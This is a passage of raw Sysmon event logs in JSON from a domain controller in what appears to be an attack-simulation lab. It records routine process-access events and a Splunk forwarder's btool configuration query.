C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.979\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nProcessId: 4384\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nParentProcessId: 5076\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.979","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","ParentProcessId":"5076","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nSourceProcessId: 5076\r\nSourceThreadId: 5084\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","SourceProcessId":"5076","SourceThreadId":"5084","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 